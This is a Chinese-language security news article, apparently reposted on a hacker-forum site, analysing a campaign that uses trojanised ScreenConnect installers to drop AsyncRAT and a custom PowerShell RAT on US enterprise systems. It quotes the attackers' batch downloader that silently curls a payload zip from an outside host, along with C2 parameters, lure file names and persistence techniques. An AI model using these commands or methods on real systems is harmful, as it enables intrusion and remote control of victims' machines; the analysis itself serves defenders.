一场复杂的网络攻击活动已出现,威胁行为者通过植入恶意代码的 ConnectWise ScreenConnect 安装程序,将目标锁定在美国境内的企业。这标志着远程监控与管理(RMM)工具滥用技术出现了显著升级。
自 2025 年 3 月以来,此类攻击的频率和技术复杂度不断提升 —— 攻击者利用合法的管理软件,在企业网络内部建立持久化立足点。
该攻击活动采用具有欺骗性的社会工程学手段,分发伪装成官方文档的恶意安装程序,例如文件名伪装为 “agreement_support-pdf [.] Client [.] exe”(协议支持文档 – pdf [.] 客户端 [.] 可执行文件)和 “Social_Security_Statement_Documents_386267 [.] exe”(社保声明文件_386267 [.] 可执行文件)的程序。
这些文件看似是合法的支持材料或财务文档,攻击者借此利用用户的信任获取系统初始访问权限。
安装程序一旦执行,就会与攻击者控制的服务器建立连接,实际上将受害者的设备转变为可远程访问的 “资产”。
此次攻击活动与以往滥用 ScreenConnect 的行为相比,核心区别在于其使用的是 ClickOnce 运行器安装程序,而非传统的完整安装程序。
安克诺斯(Acronis)的研究人员发现,这种改进后的安装程序不包含嵌入式配置数据,而是在运行时从被攻陷的基础设施中获取组件和设置。
这种架构上的变化使得检测工作难度大幅增加 —— 因为传统静态分析方法依赖识别可疑的嵌入式配置,而现在这种方法已失效。
威胁行为者展现出极高的操作复杂度:他们会在被攻陷的系统上同时部署多个远程访问木马(RAT)。
在 ScreenConnect 安装完成后的几分钟内,自动化流程会同时部署两款木马:一款是文档记载详尽的 AsyncRAT,另一款是专门为该攻击活动开发的基于 PowerShell 的定制化 RAT。
这种 “双重部署” 策略表明,要么威胁团伙在做冗余规划(确保一款木马失效时另一款仍能工作),要么多个威胁团伙共享基础设施。
通过剖析该攻击活动的多阶段感染流程,其技术复杂度可清晰显现。
(AsyncRAT 完整感染链(来源:安克诺斯))
初始的 ClickOnce 安装程序会使用 “e = Support & y = Guest & h = morco [.] rovider [.] net & p = 8041” 等参数连接攻击者的基础设施,与托管在被攻陷虚拟专用服务器(VPS)上的命令与控制(C2)服务器建立通信。
安装成功后,恶意软件会利用 ScreenConnect 内置的自动化功能,执行一个名为 “BypaasaUpdate [.] bat”(注:文件名疑似 “Bypass Update” 的拼写变形,意为 “绕过更新”)的批处理文件。
这个初始载荷相当于一个功能复杂的下载器,会获取一个包含多个加密组件的压缩包,相关代码如下:
set LINK = https[:]//guilloton[.]fr/x[.]zip // 设置压缩包下载链接
set ZIP_PATH = %ProgramData% \ali[.]zip // 设置压缩包保存路径(程序数据目录下的ali.zip)
curl -s -o "%ZIP_PATH%" %LINK% // 静默下载压缩包并保存到指定路径
下载的压缩包中包含多个经过刻意命名的文件,例如 “1 [.] txt”(内含 AsyncRAT)、“pe [.] txt”(内含 AMSI 绕过机制,AMSI 即 Windows 反恶意软件扫描接口)和 “Skype [.] ps1”(内含 PowerShell 执行脚本)。
这种命名方式是故意设计的混淆手段,目的是躲避基于特征码的检测系统(让检测工具误以为这些是普通文本或办公文件)。
该攻击的持久化机制设计尤为巧妙:攻击者创建每分钟执行一次的计划任务,同时通过互斥体(mutex)检查防止出现重复实例(避免因程序重复运行引发异常,暴露踪迹)。
PowerShell 脚本 “Skype [.] ps1” 会将加密的.NET 程序集直接加载到内存中 —— 这种方式既绕过了传统的基于文件的检测方法,又能确保威胁行为者对系统的持续访问。
此次攻击活动标志着 RMM 工具武器化技术出现了令人担忧的升级:它将 “滥用合法软件” 与 “复杂规避技术” 相结合,得以在企业内部建立持久化访问,对企业网络安全构成严重威胁。
版权声明·<<<---红客联盟--->>>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
